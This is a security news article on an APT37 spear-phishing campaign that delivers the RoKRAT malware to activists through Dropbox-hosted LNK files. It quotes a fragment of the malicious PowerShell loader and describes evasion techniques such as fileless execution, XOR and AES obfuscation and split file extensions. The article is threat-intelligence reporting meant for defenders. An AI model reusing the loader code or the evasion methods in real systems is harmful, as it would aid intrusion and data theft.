In March 2025, a sophisticated spear phishing campaign attributed to the North Korean state-sponsored hacking group APT37 has been targeting activists focused on North Korean affairs.
The attackers crafted convincing emails disguised as invitations to academic forums from a South Korean national security think tank, with subject lines referencing current geopolitical events such as “Trump 2.0 Era: Prospects and South Korean Response” and information about “North Korean Troops Deployed to Russia.”
The malicious campaign leverages Dropbox links embedded within these emails, leading victims to download compressed archives containing shortcuts (LNK files) that execute fileless malware.
This technique, known as “Living off Trusted Sites” (LoTS), enables the attackers to bypass security controls by utilizing legitimate cloud services as command and control (C2) infrastructure, making malicious traffic difficult to distinguish from legitimate business communications.
Genians Security Center (GSC) identified and analyzed this campaign, naming it “Operation: ToyBox Story” based on distinctive keywords found in the malware.
Their researchers discovered that APT37 has evolved its tactics from previous campaigns but maintained core components like the RoKRAT malware family, which has been continually deployed with minimal code changes to maximize operational effectiveness while evading detection.
The impact of these attacks extends beyond immediate data theft, as the malware captures screenshots, collects system information, and maintains persistent access to compromised systems.
Security experts are particularly concerned about this campaign’s targeting of individuals working on North Korean issues, suggesting potential intelligence gathering objectives related to South Korean national security strategies.
Infection Mechanism and Technical Analysis
The infection chain begins when victims extract and execute the LNK files delivered through Dropbox.
Genians researchers identified that these shortcuts contain embedded PowerShell commands designed to extract and execute multiple components while displaying a decoy document to the victim.
The PowerShell code, structured to avoid detection, executes a sequence of operations that create three hidden files in the %Temp% directory.
k');$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.* -File
| where {$_.extension -in $exs} | where-object {$_.length -eq
0x014F63F0} | Select-Object -ExpandProperty FullName ;$lnkFile
=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]
::Open, [System.IO.FileAccess]::Read);The analysis of the embedded shellcode reveals how the malware transforms data using XOR logic to load encrypted payloads into memory.
This fileless approach significantly reduces the malware’s footprint on disk, making traditional antivirus detection challenging.
When executed, the final payload-RoKRAT-establishes communication with command and control servers using Dropbox API calls with stolen OAuth tokens.
“This threat actor demonstrates advanced operational security by purposely breaking up file extensions during runtime execution to avoid pattern-based detection,” noted the Genians threat intelligence team.
“For example, the ‘.bat’ extension is separated and recombined using string concatenation operators, significantly hampering signature-based detection methods.”
The RoKRAT malware, once active in memory, employs sophisticated encryption using both XOR obfuscation and AES-CBC-128 algorithms to protect its communications.
The malware captures screenshots, system details, and exfiltrates data to Dropbox using access tokens linked to Russian Yandex email addresses, including “[email protected]” and “[email protected].”
.webp)
Organizations should implement EDR-based anomaly hunting capabilities to detect such fileless threats, as traditional signature-based approaches prove insufficient against these advanced persistent threats.
The continued use of cloud services as C2 infrastructure by APT37 highlights the growing challenge of distinguishing malicious from legitimate traffic in modern network environments.
How SOC Teams Save Time and Effort with ANY.RUN - Live webinar for SOC teams and managers
